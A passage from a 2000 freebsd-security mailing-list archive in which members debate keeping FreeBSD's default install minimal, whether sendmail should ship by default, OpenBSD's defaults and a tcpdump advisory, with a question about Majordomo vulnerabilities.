> was handled as a port. Some people would surtanly rather want PostFix being > installed. > I'm curious if I'm the only minimalist around here, personally I find it > much simpler to secure and administrate a box if it just includes only the > stuff that is absolutly needed. > This has been discussed quite a bit on various lists...and many people agree. What it comes down to is that code speaks louder than words. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 11:53:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from s1-c2.cnmnetwork.com (s1-c2.cnmnetwork.com [209.163.64.71]) by hub.freebsd.org (Postfix) with SMTP id 9AE5137B4C5 for ; Tue, 31 Oct 2000 11:53:25 -0800 (PST) Received: (qmail 15040 invoked from network); 31 Oct 2000 11:52:30 -0800 Received: from prometheus.cnmnetwork.com (HELO compton) (irc@209.79.28.5) by s1-c2.cnmnetwork.com with SMTP; 31 Oct 2000 11:52:30 -0800 Date: Tue, 31 Oct 2000 12:02:14 -0800 (PST) From: jrz Reply-To: jrz Subject: Re: Installer To: security@freebsd.org MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: Fxg69ebf3kMPnl9z5LZ93w== X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.4 SunOS 5.8 i86pc i386 Message-Id: <20001031195325.9AE5137B4C5@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think FreeBSD does a pretty good job at keeping the default install to a minimal. I can think of other free OS' that come loaded with 3rd party software. >On Tue, Oct 31, 2000 at 02:25:05PM +0100, Andreas Alderud wrote: >> My only wish for FreeBSD 5.0-RELEASE is that it will be as small as >> possible, right now there are tons of stuff in 4.1 being installed that I >> don't need. >> For example, I don't see the reason why Sendmail is installed by default, >> many people need it, most people don't, those who do would be better off it >> was handled as a port. Some people would surtanly rather want PostFix being >> installed. >> I'm curious if I'm the only minimalist around here, personally I find it >> much simpler to secure and administrate a box if it just includes only the >> stuff that is absolutly needed. >> > --- Jacob Zehnder Systems Engineer CNM Network / http://www.cnmnetwork.com business: jrz@cnmnetwork.com other: jrz@rackmount.org --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 13: 1:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 293F437B4C5 for ; Tue, 31 Oct 2000 13:01:26 -0800 (PST) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id e9VL1DU18593; Tue, 31 Oct 2000 13:01:14 -0800 (PST) (envelope-from jkh@winston.osd.bsdi.com) To: "Andreas Alderud" Cc: security@FreeBSD.ORG Subject: Re: Installer In-Reply-To: Message from "Andreas Alderud" of "Tue, 31 Oct 2000 14:25:05 +0100." <001501c0433d$fb8f1c20$6400a8c0@XGod> Date: Tue, 31 Oct 2000 13:01:13 -0800 Message-ID: <18589.973026073@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > My only wish for FreeBSD 5.0-RELEASE is that it will be as small as > possible, right now there are tons of stuff in 4.1 being installed that I > don't need. Until such time as FreeBSD undergoes a complete transformation in the way it's packaged as a whole, this isn't likely to happen. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 16:54:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (mail.dobox.com [208.187.122.44]) by hub.freebsd.org (Postfix) with ESMTP id 4AB8637B479 for ; Tue, 31 Oct 2000 16:54:35 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13qmAi-0000Ds-00; Tue, 31 Oct 2000 17:54:32 -0700 Message-ID: <39FF69C8.4FAFF2AB@softweyr.com> Date: Tue, 31 Oct 2000 17:54:32 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Andreas Alderud Cc: security@FreeBSD.ORG Subject: Re: Installer References: <001501c0433d$fb8f1c20$6400a8c0@XGod> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Andreas Alderud wrote: > > My only wish for FreeBSD 5.0-RELEASE is that it will be as small as > possible, right now there are tons of stuff in 4.1 being installed that I > don't need. > For example, I don't see the reason why Sendmail is installed by default, > many people need it, most people don't, those who do would be better off it > was handled as a port. Some people would surtanly rather want PostFix being > installed. > I'm curious if I'm the only minimalist around here, personally I find it > much simpler to secure and administrate a box if it just includes only the > stuff that is absolutly needed. Standard FreeBSD Answer #1: we await your patches. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 17: 4:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from post.webmailer.de (natmail2.webmailer.de [192.67.198.65]) by hub.freebsd.org (Postfix) with ESMTP id 1F91437B479 for ; Tue, 31 Oct 2000 17:04:24 -0800 (PST) Received: from umktgghc (host-209-214-44-188.mob.bellsouth.net [209.214.44.188]) by post.webmailer.de (8.9.3/8.8.7) with SMTP id CAA13030; Wed, 1 Nov 2000 02:04:10 +0100 (MET) Message-Id: <200011010104.CAA13030@post.webmailer.de> From: "Moritz Hardt" To: "Andreas Alderud" , "Wes Peters" Cc: "security@FreeBSD.ORG" Date: Tue, 31 Oct 2000 19:04:02 -0500 Reply-To: "Moritz Hardt" X-Mailer: PMMail 2000 Professional (2.10.2010) For Windows 98 (4.10.1998) In-Reply-To: <39FF69C8.4FAFF2AB@softweyr.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Re: Installer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes it's my serious wish that FreeBSD doesn't follow the trend of most (linux-) distributors and makes a GUI-Installation-Menu with a minimal installation of 500mb. I agree, that sendmail shouldn't be installed by default. A minimalistic design improves the security and makes the system easier to administrate. On Tue, 31 Oct 2000 17:54:32 -0700, Wes Peters wrote: >Andreas Alderud wrote: >> >> My only wish for FreeBSD 5.0-RELEASE is that it will be as small as >> possible, right now there are tons of stuff in 4.1 being installed that I >> don't need. >> For example, I don't see the reason why Sendmail is installed by default, >> many people need it, most people don't, those who do would be better off it >> was handled as a port. Some people would surtanly rather want PostFix being >> installed. >> I'm curious if I'm the only minimalist around here, personally I find it >> much simpler to secure and administrate a box if it just includes only the >> stuff that is absolutly needed. > >Standard FreeBSD Answer #1: we await your patches. > >-- > "Where am I, and what am I doing in this handbasket?" > >Wes Peters Softweyr LLC >wes@softweyr.com http://softweyr.com/ > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 17:41: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from rucus.ru.ac.za (rucus.ru.ac.za [146.231.29.2]) by hub.freebsd.org (Postfix) with SMTP id C7BC137B479 for ; Tue, 31 Oct 2000 17:41:02 -0800 (PST) Received: (qmail 84353 invoked by uid 1003); 1 Nov 2000 01:41:00 -0000 Date: Wed, 1 Nov 2000 03:41:00 +0200 From: Neil Blakey-Milner To: Moritz Hardt Cc: Andreas Alderud , Wes Peters , "security@FreeBSD.ORG" Subject: Re: Installer Message-ID: <20001101034100.A77550@mithrandr.moria.org> References: <39FF69C8.4FAFF2AB@softweyr.com> <200011010104.CAA13030@post.webmailer.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011010104.CAA13030@post.webmailer.de>; from mhardt@morix.de on Tue, Oct 31, 2000 at 07:04:02PM -0500 X-Operating-System: FreeBSD 4.1-STABLE i386 X-URL: http://mithrandr.moria.org/nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue 2000-10-31 (19:04), Moritz Hardt wrote: > Yes it's my serious wish that FreeBSD doesn't follow the trend of most (linux-) > distributors and makes a GUI-Installation-Menu with a minimal installation of 500mb. > I agree, that sendmail shouldn't be installed by default. A minimalistic design > improves the security and makes the system easier to administrate. I don't really want to get into this, but maybe we'll be lucky this time. Where do we find a good mail delivery/transfer agent so that our daily logs don't disappear off the edge? While I personally don't use sendmail, I think it makes sense to have it there to, well, send mail, by default. And it's not so bloated that we really begrudge it the space. The suid-bit, maybe, but not the space. Not having a mail agent is usually the exception, not the rule. Perhaps we can put a note somewhere to remove the suid bit off sendmail if you install something else. We play nicely with other mailers now with mailwrapper, so noone can really complain unless they come up with all the code to make it optional only if another mail agent is installed or a specific override is made. (this would be pretty easy with virtual packages, which you'd have to implement, which each MTA would provide. dummy-mta would also provide it, but it would be lying, and your mail would go to /dev/null. At most 8 hours of coding to put support in bsd.port.mk and pkg_install. I only charge $100/hour *hide*. Of course, since this is all base system stuff, you'd then have to package-ize large bits of the base system. You don't want to be fascist about exact versioning of the base, so you'd have to implement relative versioning. The libh project is going to facilitate all of this, and needs coders and documentors. Details on the projects page on the web site, mailing list listed in the handbook. We need help. Thank you.) Neil -- Neil Blakey-Milner nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 18:24:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 9CAE837B4C5 for ; Tue, 31 Oct 2000 18:24:44 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eA12Qff18197; Tue, 31 Oct 2000 18:26:41 -0800 (PST) (envelope-from kris) Date: Tue, 31 Oct 2000 18:26:41 -0800 From: Kris Kennaway To: Ralph Huntington Cc: Andreas Alderud , security@FreeBSD.ORG Subject: Re: Installer Message-ID: <20001031182641.A18164@citusc17.usc.edu> References: <001501c0433d$fb8f1c20$6400a8c0@XGod> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7JfCtLOvnd9MIVvH" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rjh@mohawk.net on Tue, Oct 31, 2000 at 08:31:56AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --7JfCtLOvnd9MIVvH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Oct 31, 2000 at 08:31:56AM -0500, Ralph Huntington wrote: > On Tue, 31 Oct 2000, Andreas Alderud wrote: >=20 > > I'm curious if I'm the only minimalist around here, personally I find it > > much simpler to secure and administrate a box if it just includes only = the > > stuff that is absolutly needed. >=20 > You might prefer a more minimilist BSD, e.g., OpenBSD. Personally, for the Well, I'm not sure how minimal OpenBSD really is given that it includes things like web browsers and web servers in the base system. Not having ever installed it I don't know whether this stuff is installed by default, but I'd be surprised if there was a vast difference. Kris --7JfCtLOvnd9MIVvH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn/f2EACgkQWry0BWjoQKVLNACeO07b/8y7jHylKiV67T5m/O9s bPQAoKDBjzf1wo2kWt4dGeKxct9Bvdr4 =Qx71 -----END PGP SIGNATURE----- --7JfCtLOvnd9MIVvH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 18:26:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 3EF2237B4CF; Tue, 31 Oct 2000 18:26:32 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eA12SVd18211; Tue, 31 Oct 2000 18:28:31 -0800 (PST) (envelope-from kris) Date: Tue, 31 Oct 2000 18:28:31 -0800 From: Kris Kennaway To: Borja Marcos Cc: security-advisories@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:61.tcpdump Message-ID: <20001031182831.B18164@citusc17.usc.edu> References: <20001030231311.7642A37B680@hub.freebsd.org> <39FE7E95.60F46EB5@sarenet.es> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="QKdGvSO+nmPlgiQ/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39FE7E95.60F46EB5@sarenet.es>; from borjamar@sarenet.es on Tue, Oct 31, 2000 at 09:11:01AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --QKdGvSO+nmPlgiQ/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Oct 31, 2000 at 09:11:01AM +0100, Borja Marcos wrote: > FreeBSD Security Advisories wrote: > > > > Several overflowable buffers were discovered in the version of tcpdump > > included in FreeBSD, during internal source code auditing. Some > > simply allow the remote attacker to crash the local tcpdump process, > > but there is a more serious vulnerability in the decoding of AFS ACL > > packets in the more recent version of tcpdump (tcpdump 3.5) included > > in FreeBSD 4.0-RELEASE, 4.1-RELEASE and 4.1.1-RELEASE, which may allow > > a remote attacker to execute arbitrary code on the local system > > (usually root, since root privileges are required to run tcpdump). >=20 > Something I love in FreeBSD: You don't need to be root. > Just need permissions to access /dev/bpf?. Perhaps you could > recommend running it as an ordinary user? A non-root remote exploit is nearly as bad. Arguably better to just fix it :-) Kris --QKdGvSO+nmPlgiQ/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn/f84ACgkQWry0BWjoQKVoeQCguXUdRX2kB0hA2pC58/vaTPch j1UAoJ4t+dMg5/J9EZr5Z9PiS+Oo7Evs =zedw -----END PGP SIGNATURE----- --QKdGvSO+nmPlgiQ/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 18:33:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id BAFF037B4C5; Tue, 31 Oct 2000 18:33:30 -0800 (PST) Received: by pluto.epylon.lan with Internet Mail Service (5.5.2650.21) id ; Tue, 31 Oct 2000 18:33:30 -0800 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA024250@goofy.epylon.lan> From: Jason DiCioccio To: 'Kris Kennaway' , Ralph Huntington Cc: Andreas Alderud , security@FreeBSD.ORG Subject: RE: Installer Date: Tue, 31 Oct 2000 18:33:28 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C043AC.1F0D2066" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C043AC.1F0D2066 Content-Type: text/plain; charset="iso-8859-1" Web browsers and Web servers? No, this is all in ports, just as in FreeBSD.. FreeBSD is very minimalistic as well.. Especially if we compare it to the vast majority of linux distributions as well as Solaris etc. First of all.. You CAN disable sendmail and inetd right from the configuration menu in sysinstall, in fact, defaults/rc.conf defaults to having these off as of 4.1.1.. I'm not sure how minimalistic you're looking for.. perhaps try picobsd, that should be small enough for ya! ------- Jason DiCioccio Unix BOFH mailto:jasond@epylon.com 415-593-2761 Direct & Fax 415-593-2900 Main Epylon Corporation 645 Harrison Street, Suite 200 San Francisco, CA 94107 www.epylon.com OK, so you're a Ph.D. Just don't touch anything. -----Original Message----- From: Kris Kennaway [mailto:kris@FreeBSD.ORG] Sent: Tuesday, October 31, 2000 6:27 PM To: Ralph Huntington Cc: Andreas Alderud; security@FreeBSD.ORG Subject: Re: Installer On Tue, Oct 31, 2000 at 08:31:56AM -0500, Ralph Huntington wrote: > On Tue, 31 Oct 2000, Andreas Alderud wrote: > > > I'm curious if I'm the only minimalist around here, personally I find it > > much simpler to secure and administrate a box if it just includes only the > > stuff that is absolutly needed. > > You might prefer a more minimilist BSD, e.g., OpenBSD. Personally, for the Well, I'm not sure how minimal OpenBSD really is given that it includes things like web browsers and web servers in the base system. Not having ever installed it I don't know whether this stuff is installed by default, but I'd be surprised if there was a vast difference. Kris ------_=_NextPart_000_01C043AC.1F0D2066 Content-Type: application/octet-stream; name="Jason DiCioccio.vcf" Content-Disposition: attachment; filename="Jason DiCioccio.vcf" BEGIN:VCARD VERSION:2.1 N:DiCioccio;Jason FN:Jason DiCioccio ORG:epylon.com;operations TITLE:UNIX ADMIN ADR;WORK:;;645 Harrison St;San Francisco;CA;94107;usa LABEL;WORK;ENCODING=QUOTED-PRINTABLE:645 Harrison St=0D=0ASan Francisco, CA 94107=0D=0Ausa EMAIL;PREF;INTERNET:Jason.DiCioccio@Epylon.com REV:19990105T135529Z END:VCARD ------_=_NextPart_000_01C043AC.1F0D2066-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 18:42:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 7281537B4C5; Tue, 31 Oct 2000 18:42:50 -0800 (PST) Received: by static.unixfreak.org (Postfix, from userid 1000) id 2D1B51F27; Tue, 31 Oct 2000 18:42:50 -0800 (PST) Subject: Re: Installer In-Reply-To: <657B20E93E93D4118F9700D0B73CE3EA024250@goofy.epylon.lan> "from Jason DiCioccio at Oct 31, 2000 06:33:28 pm" To: Jason DiCioccio Date: Tue, 31 Oct 2000 18:42:50 -0800 (PST) Cc: "'Kris Kennaway'" , Ralph Huntington , Andreas Alderud , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Message-Id: <20001101024250.2D1B51F27@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ Charset ISO-8859-1 unsupported, converting... ] > Web browsers and Web servers? No, this is all in ports, just as in > FreeBSD.. OpenBSD, at least 2.7, installs Apache and Lynx by default. Apache isn't run, of course, but it is there. -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. If only God would give me some clear sign! Like making a large deposit in my name at a Swiss bank. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 18:46: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id 2B17037B479; Tue, 31 Oct 2000 18:45:59 -0800 (PST) Received: by pluto.epylon.lan with Internet Mail Service (5.5.2650.21) id ; Tue, 31 Oct 2000 18:45:59 -0800 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA024251@goofy.epylon.lan> From: Jason DiCioccio To: "'dima@unixfreak.org'" Cc: 'Kris Kennaway' , Ralph Huntington , Andreas Alderud , security@FreeBSD.ORG Subject: RE: Installer Date: Tue, 31 Oct 2000 18:45:57 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C043AD.DDA85F3A" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C043AD.DDA85F3A Content-Type: text/plain; charset="iso-8859-1" Ah, then I stand corrected :).. Surprised they install lynx by default though.. ------- Jason DiCioccio Unix BOFH mailto:jasond@epylon.com 415-593-2761 Direct & Fax 415-593-2900 Main Epylon Corporation 645 Harrison Street, Suite 200 San Francisco, CA 94107 www.epylon.com OK, so you're a Ph.D. Just don't touch anything. -----Original Message----- From: Dima Dorfman [mailto:dima@unixfreak.org] Sent: Tuesday, October 31, 2000 6:43 PM To: Jason DiCioccio Cc: 'Kris Kennaway'; Ralph Huntington; Andreas Alderud; security@FreeBSD.ORG Subject: Re: Installer [ Charset ISO-8859-1 unsupported, converting... ] > Web browsers and Web servers? No, this is all in ports, just as in > FreeBSD.. OpenBSD, at least 2.7, installs Apache and Lynx by default. Apache isn't run, of course, but it is there. -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. If only God would give me some clear sign! Like making a large deposit in my name at a Swiss bank. ------_=_NextPart_000_01C043AD.DDA85F3A Content-Type: application/octet-stream; name="Jason DiCioccio.vcf" Content-Disposition: attachment; filename="Jason DiCioccio.vcf" BEGIN:VCARD VERSION:2.1 N:DiCioccio;Jason FN:Jason DiCioccio ORG:epylon.com;operations TITLE:UNIX ADMIN ADR;WORK:;;645 Harrison St;San Francisco;CA;94107;usa LABEL;WORK;ENCODING=QUOTED-PRINTABLE:645 Harrison St=0D=0ASan Francisco, CA 94107=0D=0Ausa EMAIL;PREF;INTERNET:Jason.DiCioccio@Epylon.com REV:19990105T135529Z END:VCARD ------_=_NextPart_000_01C043AD.DDA85F3A-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 19:37:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail9.wlv.netzero.net (mail9.wlv.netzero.net [209.247.163.66]) by hub.freebsd.org (Postfix) with SMTP id 1977537B479 for ; Tue, 31 Oct 2000 19:37:40 -0800 (PST) Received: (qmail 4252 invoked from network); 1 Nov 2000 03:37:35 -0000 Received: from ip34.bedford4.ma.pub-ip.psi.net (HELO CORESYNC) (38.32.73.34) by mail9.wlv.netzero.net with SMTP; 1 Nov 2000 03:37:35 -0000 Message-ID: <007401c043b5$239fca30$22492026@CORESYNC> From: "Jonathan M. Slivko" To: , Subject: Majordomo List-Server Date: Tue, 31 Oct 2000 22:37:59 -0500 MIME-Version: 1.0 Content-Type: multipart/signed; micalg=SHA1; protocol="application/x-pkcs7-signature"; boundary="----=_NextPart_000_006E_01C0438B.38EA05B0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_006E_01C0438B.38EA05B0 Content-Type: multipart/alternative; boundary="----=_NextPart_001_006F_01C0438B.38EA05B0" ------=_NextPart_001_006F_01C0438B.38EA05B0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Does anyone know of any vulnerabilities or anything like that in the = Majordomo port? I would really like to know. Thanks. -- Jonathan M. Slivko ------=_NextPart_001_006F_01C0438B.38EA05B0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Does anyone know of any vulnerabilities = or anything=20 like that in the Majordomo port? I would really like to know.=20 Thanks.
-- Jonathan M. = Slivko
------=_NextPart_001_006F_01C0438B.38EA05B0-- ------=_NextPart_000_006E_01C0438B.38EA05B0 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIII5DCCAoIw ggHroAMCAQICAwOG7TANBgkqhkiG9w0BAQQFADCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsT FENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAw MC44LjMwMB4XDTAwMTEwMTAyMzkxMVoXDTAxMTEwMTAyMzkxMVowRjEfMB0GA1UEAxMWVGhhd3Rl IEZyZWVtYWlsIE1lbWJlcjEjMCEGCSqGSIb3DQEJARYUanNsaXZrb0BiZWxnYWNvbS5uZXQwgZ8w DQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANCQC4lv3wfjuU8md3MPuaQWt+p94VJy0r+VYjgWhi5+ qp9toj6i3hh2nfCQQAIx0Ml4oemsak4sFga1GZTkwl5YZp0P4bLoltnzOkIOws5k/V4DwetyAyPc DoAJIFsZsywdJpj0YzGp6m9rT1os9M5Z1KgwjFeiUkS1MqMOYzUnAgMBAAGjMTAvMB8GA1UdEQQY MBaBFGpzbGl2a29AYmVsZ2Fjb20ubmV0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEEBQADgYEA xzsDnBBO6fWzBKKsEshWlpuIiNchgGIcG+7A2RBcm4vIB7yD3w76RM+qNgBys6x5DM0PZ0B1HkBv lEnaXGvb98RdU2HJmgJOH9u7kh2Dvy/R3qXXDgJefxjwUmqiDFe5RX72lPK/EOvdZio2C5eUppDE V4yUgrB3z4axjz2RbdYwggMpMIICkqADAgECAgEMMA0GCSqGSIb3DQEBBAUAMIHRMQswCQYDVQQG EwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoT EVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlz aW9uMSQwIgYDVQQDExtUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEW HHBlcnNvbmFsLWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDAwODMwMDAwMDAwWhcNMDIwODI5MjM1 OTU5WjCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2Fw ZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRlIFNlcnZpY2VzMSgw JgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAwMC44LjMwMIGfMA0GCSqGSIb3DQEBAQUA A4GNADCBiQKBgQDeMzKmY8cJJUU+0m54J2eBxdqIGYKXDuNEKYpjNSptcDz63K737nRvMLwzkH/5 NHGgo22Y8cNPomXbDfpL8dbdYaX5hc1VmjUanZJ1qCeu2HL5ugL217CR3hzpq+AYA6h8Q0JQUYeD PPA5tJtUihOH/7ObnUlmAC0JieyUa+mhaQIDAQABo04wTDApBgNVHREEIjAgpB4wHDEaMBgGA1UE AxMRUHJpdmF0ZUxhYmVsMS0yOTcwEgYDVR0TAQH/BAgwBgEB/wIBADALBgNVHQ8EBAMCAQYwDQYJ KoZIhvcNAQEEBQADgYEAcxtvJmWL/xU0S1liiu1EvknH6A27j7kNaiYqYoQfuIdjdBxtt88aU5FL 4c3mONntUPQ6bDSSrOaSnG7BIwHCCafvS65y3QZn9VBvLli4tgvBUFe17BzX7xe21Yibt6KIGu05 Wzl9NPy2lhglTWr0ncXDkS+plrgFPFL83eliA0gwggMtMIIClqADAgECAgEAMA0GCSqGSIb3DQEB BAUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBl IFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9u IFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0Ex KzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNOTYwMTAxMDAw MDAwWhcNMjAxMjMxMjM1OTU5WjCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2Fw ZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3VsdGluZzEoMCYGA1UE CxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UEAxMbVGhhd3RlIFBlcnNv bmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1mcmVlbWFpbEB0aGF3dGUu Y29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUadfUsJRkW3HpR9gMUbbqcpGwhF59LQ2P 